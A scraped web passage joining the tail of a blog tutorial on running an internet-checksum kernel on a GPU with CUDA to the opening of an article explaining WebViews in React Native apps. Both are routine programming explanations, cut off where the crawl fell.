GPU's memory space. */ cudaMalloc((void **)&gpu_checksum, count * sizeof(short)); Here's some more allocation but in this case it's using a pitch. This is for the memory we'll write our workload into. We're using cudaMallocPitch because this data is essentially two dimensional and the pitch facilitates optimal alignment in memory. It's basically allocating two rows of eight byte columns. unsigned char *gpu_buff; size_t gpu_buff_pitch; /* create a 2d pointer in the GPUs memory space */ cudaMallocPitch((void**)&gpu_buff, &gpu_buff_pitch, size * sizeof(unsigned char), count); Now cudaMemcpy2D will shove the workload into the two-dimensial buffer we allocated above. Think memcpy for the GPU. Care is take to specify the dimensions of the data with the pitch, size and count. The cudaMemcpyHostToDevice parameter directs the data to the GPUs memory space rather than from it. /*); Here's the money. See the <<<..., ...>>> business? The first argument is "blocks per grid" but I'll leave NVIDIA to explain that one to you in the CUDA C Programming Guide. The second argument indicates how many threads will be spawned. Like I said, this is all about parallelism. Consider our inet_checksum "kernel" hereby invoked twice in parallel! /* execute the checksum operation. two threads of execution will be executed due to the count param. */ inet_checksum<<<1, count>>>(gpu_buff, gpu_buff_pitch, size, gpu_checksum); Now the "kernel" executions are done. We've successfully executed our logic on a GPU! The results are still sitting in the GPU's memory space, however. We'll simply copy it out with cudaMemcpy while specifying cudaMemcpyDeviceToHost for the direction. The results are then in the checksums vector. /* copy the results from the GPU's memory to the host's */ cudaMemcpy(&checksums, gpu_checksum, count * sizeof(short), cudaMemcpyDeviceToHost); CUDA has its own allocating, and copying and of course its own clean-up. We'll be good citizens and use it here. /* clean up the GPU's memory space */ cudaFree(gpu_buff); cudaFree(gpu_checksum); Might as well let the user know the results, no? for(i = 0; i < count; i++) printf("Checksum #%d 0x%x\n", i + 1, checksums[i]); } return 0; } Compiling and Execution Assuming you've installed the CUDA SDK according to the documentation you can compile with: > nvcc -o yourprogram yoursourcefile.cu and execution produces: > ./yourprogram Checksum #1 0x1aff Checksum #2 0x16fb .cu being the preferred extension to be used with the CUDA pre-processor. Conclusion There you have it. Execution of your own logic on a GPU. Where to go from here? Well, this barely scratched the surface but NVIDIA's CUDA Zone site is the starting point to much more. GPGPU.org is also a more platform independent source of general-purpose GPU computing. Sun Jan 09 2011 03:01:45 GMT+0000 (UTC) Recently)
http://www.chrisumbel.com/?page=3
CC-MAIN-2017-43
refinedweb
1,509
55.24
hi all. This might be more of a math problem then anything, but i'll give it a shot. I have an idea for a game i am working on, in which the player must advanced thru a level my the means of propelling a cube in the air (across the level and around barriers). The way this is done, is the player clicks on anywhere on the screen, and the cube is propelled in the direction of the angle between the player and the mouse position. here's a picture that attempts to explain it. So pretty much, i have a function return_cube_slope(mpos,obj_pos), that returns the slope for the cube: def dist(p1,p2): # returns the distance (length of the line) return math.sqrt( (p2[0]-p1[0])**2+(p2[1]-p1[1])**2 ) def return_cube_slope(mpos,obj_pos): # velocity for how fast the cube will move velocity = 3 l1 = dist(obj_pos,mpos) # hypotenus l2 = dist(mpos,[mpos[0],obj_pos[1]]) # adjacent # radians radians = math.asin( l2/l1 ) # angle angle = math.degrees(radians) print angle # actual slope move_x = math.sin(radians)*-velocity move_y = math.cos(radians)*-velocity # return the slope return [move_x,move_y] Look at it this way: this can only return a value from 0 to 90. how would I go about re-writing my function to have it support angles 0 thru 360?
https://www.daniweb.com/programming/software-development/threads/214737/how-to-let-python-know-i-want-an-angle-90-degreess
CC-MAIN-2018-51
refinedweb
227
62.38
celGameClientManager Class ReferenceThis is an interface you should implement in order to manage the events from the client. More... #include <physicallayer/network.h> Detailed DescriptionThis is an interface you should implement in order to manage the events from the client. You can use it to: - listen for changes in the state of the network connection to the server. - get the data of the player validated by the server. - catch the server events. - handle the creation and removing of the network links. - close the client. Definition at line 664 of file network.h. Member Function Documentation The client will be closed. You should delete here the physical layer of the client. A network link has been set up on the server side between a server entity and this client. A copy entity must be created on this client side. This copy entity will be the adressee of the updates from the network link. If the server is available in the same process, you can simply use the entity of the server and then return 0 to this function. - Parameters: - - Returns: - the copy entity. A server event has been catched. The level has changed. The client need to do iCelGameClient::SetReady when the new level is loaded. There is a change in the way the entity is controlled, ie if it is controlled by the client or by the server side. If the entity is now controlled on the client side, you should then set a behavior to it. Most presumably, the behavior will catch the actions of the player and update accordingly the entity. If the entity is now controlled on the server side, you should then remove any behavior from the entity and let the client update it from the server. - Parameters: - The network link to the specified entity is closing. The client can remove the entity from the physical layer. The data of the player has been validated by the server. The documentation for this class was generated from the following file: Generated for CEL: Crystal Entity Layer by doxygen 1.4.7
http://crystalspace3d.org/cel/docs/online/api-1.0/classcelGameClientManager.html
CC-MAIN-2013-20
refinedweb
344
66.74
Feature #8626 Add a Set coercion method to the standard lib: Set(possible_set) Description =begin I'd like to be able to take an object that may already be a Set (or not) and ensure that it is one For example: set1 = Set.new set2 = Set(set1) set3 = Set(nil) assert set1.equal?(set2) assert_instance_of(Set, set3) This is different from the behavior of Set.new in that it will return the same set rather than creating a new one set1 = Set.new set2 = Set.new(set1) # <--- completely new object in memory set2 = Set(set1) # <--- same object from memory My thoughts about the implementation are simple: def Set(possible_set) possible_set.is_a?(Set) ? possible_set : Set.new(possible_set) end I'm not sure if there are edge cases to unexpected behavior that I haven't thought of and I'm wondering if it ought to have a Set.try_convert as well =end History #1 Updated by Jim Gay almost 2 years ago I've created a pull request for MRI here #2 Updated by Jim Gay over 1 year ago This has been merged into ruby trunk in Also available in: Atom PDF
https://bugs.ruby-lang.org/issues/8626
CC-MAIN-2015-27
refinedweb
191
58.62
Well-typed Vignettes Well-typed Vignettes I present to you some well-typed programs along with associated run-time and compile-time errors for pondering the meaning of the phrase "Well-typed programs cannot go wrong." Join the DZone community and get the full member experience.Join For Free Access over 20 APIs and mobile SDKs, up to 250k transactions free with no credit card required I present to you some well-typed programs along with associated run-time and compile-time errors for pondering the meaning of "well-typed". For context, I was trying to understand the meaning of the quote “Well-typed programs cannot go wrong.” The exercise was illuminating for me, but when I started writing explanations they got a little too philosophical, so I’m just going to present the code and the errors. Ruby puts File.read(ARGV[0]) Errno::ENOENT If the file does not exist then there is nothing to do. All programming languages no matter how good their type system can not reason about what is external to them and so the sane thing to do is throw an error and halt or let the programmer do something with that error. In Ruby’s case it does the right thing and throws an exception: main.rb:1:in 'read': No such file or directory @ rb_sysopen - asdf (Errno::ENOENT) from main.rb:1:in '<main>' TypeError Contrary to popular belief Ruby actually has static types it’s just that nothing is done with them until run-time. When an argument of the wrong type is passed to a method we get a type error. The difference is that in a more statically typed language the error would be during compile-time instead of run-time: def to_stdout(filename) puts File.read(filename) end to_stdout(1) main.rb:2:in 'read': no implicit conversion of Fixnum into String (TypeError) from main.rb:2:in 'to_stdout' from main.rb:4:in '<main>' Haskell import System.IO import System.Environment dumpContents :: FilePath -> IO () dumpContents fileName = openFile fileName ReadMode >>= hGetContents >>= putStrLn main :: IO () main = getArgs >>= \args -> dumpContents (args !! 0) Prelude.(!!): index too large Just as in the Ruby case, Haskell will throw a run-time exception when assumptions about the external world fail. If I don’t pass enough arguments then we get a run-time error: main: Prelude.(!!): index too large openFile: does not exist (No such file or directory) Similarly, if I pass an argument that corresponds to a file that does not exist we again get a run-time error: main: asdf: openFile: does not exist (No such file or directory) Notice that up to this point both Haskell and Ruby have failed in exactly the same way with run-time errors. Couldn’t match type ‘[Char]’ with ‘Char’ So, this is the one case where Haskell does one better than Ruby. When I pass the wrong argument to dumpContents instead of getting a run-time error the compiler tells me that something is not lining up properly: [1 of 1] Compiling Main ( main.hs, main.o ) main.hs:9:43: Couldn't match type ‘[Char]’ with ‘Char’ Expected type: FilePath Actual type: [String] In the first argument of ‘dumpContents’, namely ‘(args)’ In the expression: dumpContents (args) TypeScript All of the same things happen with TypeScript except we get to choose how strongly we want to enforce certain constraints. These days TypeScript is my go-to choice for all things related to JavaScript. /// <reference path="/home/david/Downloads/node.d.ts"/> var fs = require('fs'); fs.readFile(process.argv[2], (error : string, data : Buffer) => { console.log(data.toString()); }); TypeError: path must be a string fs.js:491 binding.open(pathModule._makeLong(path), ^ TypeError: path must be a string at TypeError (native) at Object.fs.open (fs.js:491:11) at Object.fs.readFile (fs.js:262:6) at Object.<anonymous> (/home/david/test/main.js:3:4) at Module._compile (module.js:460:26) at Object.Module._extensions..js (module.js:478:10) at Module.load (module.js:355:32) at Function.Module._load (module.js:310:12) at Function.Module.runMain (module.js:501:10) at startup (node.js:129:16) TypeError: Cannot read property ‘toString’ of undefined /home/david/test/main.js:4 console.log(data.toString()); ^ TypeError: Cannot read property 'toString' of undefined at /home/david/test/main.js:4:21 at fs.js:263:20 at FSReqWrap.oncomplete (fs.js:95:15) #1 for location developers in quality, price and choice, switch to HERE. }}
https://dzone.com/articles/well-typed-vignettes
CC-MAIN-2019-09
refinedweb
754
57.06
An object through which external interfaces can obtain progress reports when running long calculations. More... #include <progress/nprogress.h> An object through which external interfaces can obtain progress reports when running long calculations. The running calculation writes to this object to store the current state of progress, and the external interface reads from this object from a different thread. When writing progress information to an NProgress object, the last call should be to setFinished(). This informs all threads that the operation is finished and that the NProgress object can be deleted without the risk that the writing thread will attempt to access it again. If the operation allows it, the reading thread may at any time request that the operation be cancelled by calling cancel(). The writing thread should regularly poll isCancelled(), and if it detects a cancellation request should exit cleanly as soon as possible. Note that the writing thread should still call setFinished() in this situation. NProgress contains multithreading support; a mutex is used to ensure that the reading and writing threads do not interfere. NProgress also contains timing support, with measurements in both real time and CPU time. See the routines getRealTime() and totalCPUTime() for details. Subclasses of NProgress represent the various ways in which progress can be internally stored. Note that subclass member functions must lock the mutex whenever internal data is being accessed or modified (see NMutex::MutexLock for how this is done). Any public subclass member function that changes the state of progress must set the changed flag to true, and all public subclass query functions must set the changed flag to false. Destroys this object.. Implemented in regina::NProgressFinished, regina::NProgressNumber, and regina::NProgressMessage. Returns the current state of progress as a percentage. The default implementation returns 0. This function must not touch the mutex, and is not required to alter the changed flag. The getDescription() routine takes care of all of these issues. Reimplemented in regina::NProgressFinished, and regina::NProgressNumber. in regina::NProgressFinished, and regina::NProgressNumber.?
http://regina.sourceforge.net/engine-docs/classregina_1_1NProgress.html
CC-MAIN-2014-42
refinedweb
334
56.55
How do I Server Side Render my Sweet Counter Component? A simple setup to server side render a React component What are we building here? The end result of this app is a counter that is initially rendered server-side and then updated with client-side JavaScript. The goal is to minimize the parts needed to get an app up and running. Webpack is used to compile the client-side React code. Server-side code is compiled on the fly with @babel/register. When everything is ready the app runs by first compiling client-side code with yarn start, starting a node server with yarn server, and opening the browser to localhost:3000. This represents a minimal example of a server-side rendered (SSR) React app. This app is not production ready, it's not the only way to set up SSR, and is meant as an introduction to the concept of SSR React. There are more robust solutions that make working with SSR code easier, and solve many of the problems that an SSR app would run into. Some frameworks to explore are NEXT.js and Gatsby. All the code can be found on this repo with (hopefully) enough comments to explain what is going on in the code. Prerequisites This blog post requires basic understanding of yarn, node, Webpack, React, and Babel. This app also uses Express.js to start a server and server-side render the app with node.js. In this app Webpack (using babel-loader) is used to transform the latest JavaScript in the client.js file into a bundle that the server.js file includes using <script src="./assets/app.bundle.js"></script>. Babel is also used in index.js via require('@babel/register') to avoid the need of a more complex Webapck setup. @babel/register transforms server.js to JavaScript that can be understood by Node.js. Both @babel/register and the Webpack configuration use the .babelrc file to configure babel transformations. The Parts As mentioned above, this basic setup of a server-side rendered React app includes 6 files. - The client - The server - A componentthat will be rendered server-die and then updated by client-side - An entry point - We will also need a webpack.config.jsfile to compile the clientcode - And a .babelrcfile with some configurations for the babel-loader used by Webpack and by @babel/register The Component A Counter component defined in /src/components/Counter.js. The Counter renders a h1 tag that shows the current count. import React, { Component } from 'react' class Counter extends Component { state = { count: 0 } componentDidMount() { this.count() } count = () => { this.setState(prevState => { return { count: prevState.count + 1 } }) setTimeout(this.count, 1000) } render() { return <h1>Count: {this.state.count}</h1> } } export default Counter The important parts to understand are: - The component has an initial state of { count: 0 } - The component renders an h1tag with the text Count: <the-current-count> - Increasing the count doesn't start until after the clientcode runs The Counter component is initially rendered by the server. The client side JavaScript then attaches itself (hydrates) and updates the state. In other words the server outputs: ... <h1>Count: 0</h1> ... After the client-side JavaScript has loaded it can update the count every second. The Server Express is a fast way to get a Node.js app running. The server's job is to take the Counter component, convert it to html, and render it for the client-side code to take over control. Here is all the code needed to set up the server. import express from 'express' import path from 'path' import React from 'react' import { renderToString } from 'react-dom/server' import Counter from './components/Counter' /** * Create an express app */ const app = express() /** * Set the location of the static assets (ie the js bundle generated by webapck) */ app.use(express.static(path.resolve(__dirname, '../public'))) /** * Create a route that matches any path entered on the url bar */ app.get('/*', (req, res) => { /** * Convert JSX code to a HTML string that can be rendered server-side with * `renderToString` a method provided by ReactDOMServer * * This sets up the app so that calling ReactDOM.hydrate() will preserve the * rendered HTML and only attach event handlers. In this app this is done in * `client.js` * () */ const jsx = <Counter /> const reactDom = renderToString(jsx) /** * Set the app's response to 200 OK () * Tells the browser this is a html text page and then returns the template * complete with the HTML string created from JSX React code created above */ res.writeHead(200, { 'Content-Type': 'text/html' }) res.end(htmlTemplate(reactDom)) }) /** * Tells the app to listen on port 3000 allowing access to the app on * localhost:3000 */ app.listen(3000) /** * An HTML String template to be rendered by the Node.js server. This function * takes a single argument: The HTML string created by passing JSX to * `renderToString`. And returns an HTML string that the Node.js server displays * on localhost:3000 */ function htmlTemplate(reactDom) { return ` <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>React SSR</title> </head> <body> <div id="app">${reactDom}</div> <script src="./assets/app.bundle.js"></script> </body> </html> ` } The most important things to note are: renderToStringconverts the component to an HTML string - we are only outputting html <script src="./assets/app.bundle.js"></script>is a webpack bundle of the compiled client.jscode. The Client On a standard client-side app (CSA) the render method provided by the react-dom package is probably being used to render a React element into the specified container in the DOM. It would look something like this: import React from 'react' import ReactDOM from 'react-dom' import Counter from './components/Counter' const app = document.getElementById( 'app' ) ReactDOM.render( <Counter />, app ) In the SSR context the server has already rendered the Counter component. It already exists in the DOM. The react-dom package provides the hydrate method to "hydrate a container whose HTML contents were rendered by ReactDOMServer." Simply put hydrate attaches event listeners to existing markup in a container. The only thing that changes from the code above is replacing render with hydrate: import React from 'react' import { hydrate } from 'react-dom' import Counter from './components/Counter' const app = document.getElementById('app') // Use hydrate instead of render to attach event listeners to existing markup hydrate(<Counter />, app) The Entry Point The index.js file at the root of the project requires('sever.js') and uses @babel/register to compile files on the fly. The index.js file is small: require('@babel/register') require('./src/server') @babel/register does the magic of converting the server js into something node.js can process and output. In this example we are only doing this to avoid any more complicated webpack configuration. You probably wouldn't do this in a real project, this is just a fast way to get this set up for the sake of demonstration. Compiling client.js The entry point will take care of compiling server-side code, but what about our client-side code? Earlier in the server.js code I pointed out this line: <script src="./assets/app.bundle.js"></script> This adds script tag references the cient-side code, however we can't just load client.js. First it needs to be compiled to something the browser can understand. The webpack configuration file below takes the client.js file and converts it to the app.bundle.js file the app will use. const path = require('path') const CleanWebpackPlugin = require('clean-webpack-plugin') module.exports = { // Sets process.env.NODE_ENV by configuring DefinePlugin mode: 'development', // gives a name to your bundle { name: .... } entry: { app: './src/client.js' }, // source mapping style devtool: 'cheap-module-eval-source-map', // determines the name and place for your output bundles output: { filename: 'assets/[name].bundle.js', path: path.resolve(__dirname, 'public') }, plugins: [ // deletes the public folder for fresh builds new CleanWebpackPlugin(['public']) ], // sets rules for processing different files being 'imported' // (or loaded) into js files module: { rules: [ { test: /\.js$/, exclude: /node_modules/, use: [ { // uses .babelrc as config loader: 'babel-loader' } ] } ] } } As mentioned in the comments in this file a .babelrc file is needed. It looks likes this: { "presets": ["@babel/env", "@babel/react"], "plugins": ["@babel/plugin-proposal-class-properties"] } Explanations of each of these is out of the scope of this post, but broadly these are used to compile the javascript we write to javascript a node server or browser can understand. Running the app After putting together all these parts our folder structure will looks something like this: /src -- client.js -- server.js -- /components ---- counter.js .babelrc index.js package.json webpack.config.js "dependencies": { "express": "^4.16.4", "path": "^0.12.7", "react": "^16.6.3", "react-dom": "^16.6.3" }, "devDependencies": { "@babel/core": "^7.2.0", "@babel/plugin-proposal-class-properties": "^7.2.1", "@babel/preset-env": "^7.2.0", "@babel/preset-react": "^7.0.0", "@babel/register": "^7.0.0", "babel-loader": "^8.0.4", "clean-webpack-plugin": "^1.0.0", "webpack": "^4.27.1", "webpack-cli": "^3.1.2", "webpack-node-externals": "^1.7.2" } Assuming the above structure and that all the packages have been installed we can create two scripts to run our app (in package.json): "scripts": { "start": "webpack", "server": "node index.js" } Then in a terminal run yarn start and then yarn server. The first script will compile the client.js code and create the public folder containing assets/app.bundle.js. The second script will start the node.js server. Navigate to localhost:3000 (this is where we told our server.js to start the server) and you should see the counter. What Now? Hopefully this explains some of what is going on in with server-side rendered React. This is a very basic example, for more robust apps you may want to consider a framework to help you out, as mentioned in the intro some frameworks to check out are: Gatsby and Next. Gatsby and Next offer features like static site generation, automatic code splitting, filesystem based routing, hot code reloading, and more. If you have any questions, suggestions, or notice any bugs don't hesitate to make an issue on the repo and be sure to reference the react-ssr-wo-webpack branch.
https://www.viget.com/articles/how-do-i-server-side-render-my-sweet-counter-component/
CC-MAIN-2021-43
refinedweb
1,699
59.4
Users with highly available clusters under heavy transaction loads may want to upgrade to a newer version of MarkLogic in a seamless manner. A rolling upgrade, where hosts in a cluster are upgraded one by one, is one approach to addressing this need. Rolling upgrades are used to upgrade a large cluster with many hosts to a newer version of MarkLogic Server without incurring any downtime in availability or interruption of transactions. A rolling upgrade may also be used to apply patches to multiple hosts. The goal in performing a rolling upgrade is to have zero downtime of your server availability or transactional data. This is most useful for large high availability (HA) clusters that have a large number of ongoing transactions. A rolling upgrade can be performed on both a primary cluster and a disaster recovery (DR) cluster. Your cluster must have MarkLogic 8.0-6 or later installed to perform a rolling upgrade. The rolling upgrade feature works on all supported platforms. Rolling upgrades will only work when upgrading from MarkLogic 8.0-6 or later to MarkLogic 10.0-x or later. Do not change your application to take advantage of any 10.0-1 features until all the nodes in your cluster have been upgraded to 10.0-1. In addition, you should avoid making any configuration changes to your cluster during a rolling upgrade. This chapter describes rolling upgrades and includes the following sections: A rolling upgrade incrementally installs a later version of MarkLogic Server (host by host), rather than having to take down the whole cluster to install the newer version. Performing a rolling upgrade means that your cluster may be in a mixed state (where more than one version of MarkLogic Server is running) for some period of time during the upgrade process. During the process, the features in the newer version of MarkLogic will not be available until the whole cluster has been committed to the new version. Because of this you may have to change or modify some of your application code prior to starting the rolling upgrade, so that code will work in a mixed environment. For example, JavaScript code may need modification (because of the new version of V8 for server-side JavaScript) before you commit the upgrade. The security database and the schemas database must be on the same host, and that host should be the first host you upgrade when upgrading a cluster. In a mixed node cluster, before the upgrade has been commited, the node that has been upgraded to MarkLogic 10.0-1 will be read-only. This is to prevent any configuration changes from the 10.0-1 node. We strongly recommend that you not make any configuration changes until you have finished upgrading the entire cluster. The rolling upgrade feature is designed is to enable business continuity while a cluster is being upgraded. The window of time when a cluster has nodes of varying versions should be small. During this time, do not make application code changes and/or configuration changes. Configuration changes involve the following: In addition, do not perform any manual merges and disable reindexing while the cluster has nodes that are at different software version levels. Changing error log settings and adding trace events to debug issues should be fine. You can upgrade your cluster with a minimal amount of transactional downtime (less than 5-10 minutes) without using the rolling upgrade feature. Consider whether the tradeoff in added complexity warrants using rolling upgrades instead of the regular upgrade process. See Upgrading from Previous Releases in the Installation Guide for information about the regular upgrade process. Here are the steps in the rolling upgrade process: Before you start your upgrade, you will need to backup the hosts you are going to upgrade. Then do any preparation of code or applications that is necessary prior to the upgrade (see Interaction with Other MarkLogic Features) for possible preparations. When you have completed the upgrade, you may need to perform some clean up. You can view the status of a rolling upgrade in the Admin UI. To view the rolling upgrade status, complete the following procedure: If a rolling upgrade is in progress, a sync icon will appear to the right of the version number from which you are upgrading, which is located above the left tree menu. Click the sync icon to navigate to the Upgrade tab. If a rolling upgrade is not in progress, all hosts in the cluster are running the same version. Click the Upgrade tab to verify the version number. Until you commit the upgrade, the effective version of the hosts in the cluster is the earlier version, not the newer version (for example 9.0-6, not 10.0-1). The effective version is the version that the cluster as a whole is running. The software version is the version of MarkLogic Server that is installed on each host. You will be prompted to upgrade the Security database when you log into the Admin UI. After commiting a rolling upgrade you can only restore to the later version (for example, 10.0-1), not to the earlier version (for example, 9.0-6). Running your cluster in an uncommited state is equivalent to running in the previous (earlier) version of MarkLogic. No 10.0-1 features are available until the upgrade has been commited. An upgrade of the Security database is required after you have committed the new version of MarkLogic. The following is a simplified step-by-step process for a rolling upgrade, on a small, three host cluster. The general outline is to first backup all of your hosts, make any changes to software applications, then proceed with the rolling upgrade, failing over and upgrading each node. When all nodes in the cluster have been upgraded, verify that you can commit the upgrade and change the cluster effective version to the new version. Finish by doing any cleanup that is necessary. In addition, prior to starting the upgrade, you may need to modify some of your existing software to run in mixed version cluster. See Interaction with Other MarkLogic Features for details. MarkLogic 9 will not work on Red Hat Enterprise Linux 6. See Supported Platforms in the Release Notes for more information. curlcommand so that you can also take advantage of the fast failover feature. curl -X POST --anyauth --user admin:admin -d "state=shutdown&failover=true " "" The failover parameter was added to POST /manage/v2/hosts/{id|name} in MarkLogic version 9.0-5. The above call will fail in previous versions of MarkLogic. rpm uninstall MarkLogic-8.0-1.x86_64.rpm rpm install MarkLogic-10.0-3.x86_64.rpm sudo /sbin/service MarkLogic start Use this XQuery command to check the cluster's effective version: xquery version "1.0-ml"; import module namespace admin = "" at "/MarkLogic/admin.xqy"; let $config := admin:get-configuration() return admin:cluster-get-effective-version($config) => (: returns the effective software version of this cluster :) Use this query to check if the cluster is ready to commit the upgrade: xquery version "1.0-ml"; import module namespace admin = "" at "/MarkLogic/admin.xqy"; admin:can-commit-upgrade() => (: returns true if the cluster is ready to commit the upgrade :) The cluster version should be 9000100 or later for the upgrade to commit. Upgrade the Security database on the host cluster. After committing the upgrade, verify the upgrade with this query: xquery version "1.0-ml"; import module namespace admin = "" at "/MarkLogic/admin.xqy"; let $config := admin:get-configuration() return admin:cluster-get-effective-version($config) => (: returns the effective software version of the cluster :) This step-by-step example for a simple rolling upgrade can also be scripted. For an example model for a script, see Rolling Upgrades Using REST Management APIs. You can perform a rolling upgrade via scripting through the REST Management APIs or by using the XQuery APIs. You can also perform a rolling upgrade on an AWS cluster. This section describes the different options for configuring and performing a rolling upgrade. After backing up your hosts and preparing your applications, you can perform a rolling upgrade using the REST Management APIs. The following example assumes a three node cluster with 8.0-6 installed, upgrading to 10.0-x. Upgrade your cluster to Red Hat Enterprise Linux 7 (x64) before starting the MarkLogic upgrade. MarkLogic 10 will not work on Red Hat Enterprise Linux 6. See Supported Platforms in the Release Notes for more information. The following code sample can be used as a model to script an upgrade of a single three-node cluster. Please note that, when doing a rolling upgrade from 8.0 to 10.0 (with 9.0 being skipped), you must not use the Management REST API at all. You may use the Admin API, but only to read cluster configuration. This does not affect rolling upgrades from 8.0 to 9.0 or upgrades from 9.0 to 10.0. (: This is an end-to-end scenario to orchestrate a rolling upgrade on a 3-node 9.0 cluster to a 10.0 build. :) (: Iterate over each host in the cluster :) GET:/manage/v2/hosts (: Remove host from load-balancer rotation if necessary :) PUT:/manage/v2/hosts/{id|name}/properties (: Disable any local-disk forests on the host to force a failover :) PUT:/manage/v2/forests/{id|name}/properties (: Change primary host for any shared-disk forests :) PUT:/manage/v2/forests/{id|name}/properties (: Restart any failover forests that are open on the host :) PUT:/manage/v2/forests/{id|name}?state=restart $ curl --anyauth --user user:password -i -X POST \ -d '{"operation": "restart-local-cluster"}'\ (: Wait for task-server and app servers to become idle :) GET:/manage/v2/servers, GET:/manage/v2/servers/{id|name}?view=status (: Stop the host :) $ curl -v -X POST --anyauth --user admin:admin \ -H "Content-Type:application/x-www-form-urlencoded" \ -d '{"operation": "shutdown-local-cluster"}' \ "" (: Start the host :) $ curl -v -X POST --anyauth --user admin:admin \ -H "Content-Type:application/x-www-form-urlencoded" \ -d '{"operation": "restart-local-cluster"}'\ "" (: Enable any local-disk failover forest on the host :) PUT:/manage/v2/forests/{id|name}/properties (: Restore primary host for any shared-disk forests :) PUT:/manage/v2/forests/{id|name}/properties (: Restart any failover forests that should fail back. :) PUT:/manage/v2/forests/{id|name}?state=restart PUT:/manage/v2/forests/{id|name}/properties (: upgrade security db :) curl -v -X POST --anyauth --user admin:admin \ --header "Content-Type:application/x-www-form-urlencoded" \ -d '{"operation": "security-database-upgrade-local-cluster"}'\ "" (: verify cluster version :) curl -v -X GET --anyauth --user admin:admin --header "Content-Type:application/json" | tools/jq/jq '. ["local-clusterlocalhost-default"]["effective-version"]'` The jq tool is used to parse out the json properties. It is a free download from The process for performing a rolling upgrade in EC2 (AWS) is fairly simple. It is very similar to a normal update of the Cloud Formation templates. See Upgrading MarkLogic on AWS in the MarkLogic Server on Amazon Web Services (AWS) Guide for details about a normal update. This example assumes an existing 3-node cluster running MarkLogic 8.0 from Cloud Formation templates. Before you upgrade your instance, you need to upgrade your Cloud Formation template to reference the new AMI (9.0 CF template). See for details about upgrading your templates. Here are the additional steps: We do not recommend that you automatically swap out the Cloud Formation template. Instead, make a copy of your existing template (if it contains the AMI IDs), edit just the AMI IDs, and then use that for the update. (If the AMI ID is passed as a parameter or other means, use those means). Wait for the host to come back up (with new host> The XQuery Admin APIs can be used to set up and perform a rolling upgrade through the Query Console. This section contains sample code that you can use from the Query Console. To get the host versions via> To complete the upgrade, log onto the Admin UI to upgrade the Security database. Committing the upgrade results in the updated configuration being saved with a re-read delay of 5 seconds to ensure that all online hosts have received the new file before XDQP connections start dropping. See step #10 in Upgrading an EC2 Instance. If the servers don't have the correct version, there may be a host that is in maintenance mode. The admin:can-commit-upgrade function will return true if all servers have the correct software version. See Admin APIs for more about the XQuery Admin APIs available. Upgrade the disaster recovery cluster first. It is important to upgrade the disaster recovery cluster first, since the newer version of the software will be able to receive fragments and journal frames encoded on the master cluster. Once the disaster recovery cluster has been upgraded, then upgrade the production cluster. As long as you have not committed your upgrade to MarkLogic 9 or later, you can reinstall the earlier version of the server (MarkLogic 8.0-6) on each node. In the event that you need to roll back an upgrade that has not been completed and committed, you can roll back the partial upgrade by re-installing the previous version of MarkLogic (for example 8.0-6) on the machines that have been upgraded. These APIs are available for managing rolling upgrades in a MarkLogic cluster. These Admin API functions are available for rolling upgrades: Returns the cluster's effective MarkLogic version (for example, 8000600 for 8.0-6). Returns true if the cluster is ready to commit the upgrade, returns false otherwise. The following REST Management endpoints provide useful information and functionality when performing a Rolling Upgrade operation. For existing features that will work as expected with MarkLogic 9, a rolling upgrade will not have any impact. Some existing features may not work as expected until the rolling upgrade is complete and the cluster has been committed to the newer version. One possible example of this would be semantic trcples, where the triple count may be increased after inserting same data twice in during a rolling upgrade in mixed mode. During a rolling upgrade, the MarkLogic 9 triple index is not able to return triples in the correct order for MarkLogic 8 semantics. A user would need to have multiple triples that are identical, except for the types of the values for this situation to occur. Features introduced in MarkLogic 9 may or may not work in a mixed cluster (a cluster that has not been completely upgraded to MarkLogic 9, and has an effective version of 8.0-x). The following is a list of features that may need to be monitored while performing rolling upgrade. Beginning in MarkLogic 9, an updated version of SQL using the triple index is introduced. The existing version (pre-MarkLogic 9) will continue to work in a mixed cluster, and after the cluster has been upgraded to 9.0-x or 10.0-x. The updated version of SQL will not work in a mixed cluster. You will need to upgrade to the newer version of MarkLogic and commit the upgrade before those features are available. The earlier version of SQL based on range indexes will work in the mixed cluster (prior to committing the upgrade), and it will also work with MarkLogic 9 and later. In the new version of Server-Side JavaScript, ValueIterator has been replaced by Sequence.. To prepare your code for a possible mixed environment, you might use a safe coding pattern similar to this: var list = xdmp.arrayValues(...); if (list instanceof Sequence) { ... ML9 idiom ... } else { ... ML8 idiom ... } See Sequence in the JavaScript Reference Guide and Sequence in the MarkLogic Server-Side JavaScript Function Reference for more information. When upgrading to MarkLogic 9, you can upgrade a Java application from Java Client API 3.x to 4.x before upgrading from MarkLogic 8 to MarkLogic 9. However, you must first upgrade your JRE to version 1.8 or later. The Java Client API version 4.x only supports JRE 1.8 or later. When upgrading from MarkLogic 8, plugins will not work in a mixed cluster because the interface for UDFs has changed. You cannot have the same code compiled against two different sets of definitions from two different releases. You must recompile and redeploy your UDF libraries for MarkLogic 9 and later. In MarkLogic 9, a change was made to store circle radii as kilometers instead of miles. When operating in a mixed cluster consisting of 9.0-1 and 9.0-2 nodes, you may receive unexpected results for reverse queries involving circles. No issues exist when upgrading from MarkLogic 8.0-x. There are alternatives to rolling upgrades for applying patches or upgrading your hosts. You can preform an upgrade to hosts in a cluster will very minimal downtime. See Upgrading from Previous Releases in the Installation Guide for more information.
http://docs.marklogic.com/guide/admin/rolling-upgrades
CC-MAIN-2020-34
refinedweb
2,834
55.74
A few days back, I had a small requirement of testing a responsive web application inside a WebView in a React Native application. When I first used WebView inside a React Native application a year ago, we had a core WebView component provided by React Native. But now things have changed and they recommend a third-party module. This article talks about all that and has code examples. Let’s get started. What is a WebView? When it comes to accessing internet content, we typically use a browser like Chrome, Firefox, Safari, Internet Explorer, and Edge. You are probably using one of those browsers right now to read this article! A WebView is an embeddable browser that a native application can use to display web content. A Native application is an iOS and Android application. There are others as well like Windows Phone and other OS, but we are not talking about them at the moment. A WebView is a subset of a regular web browser. It does not have the navigation bar or the status bar of a web browser. It has just the browser viewport to display HTML. So WebView can display a web page or the content of a web URL. We will anyways find that out when we dive into our code sample. Why do you want to use a WebView inside a React Native application? Because sometimes you may need to display a web page inside your React Native application or show some HTML content. For example – a Privacy Policy Page which is already published on your website. You may just want to show the web page inside your React Native application rather than typing the whole thing again. In fact, we have been using WebViews even before React Native. I hope you have heard about hybrid mobile applications. Technologies like Phonegap/Cordova uses a WebView to show the bundled web application. So you write your application using HTML, CSS and JavaScript. Then using Phonegap you would wrap into a native package. Internally Phonegap would launch a WebView and render the packaged web application. Getting Started Alright, enough talking. Let’s get up and running with some code. Note: In case you have not set up React Native, please do it first. Follow the 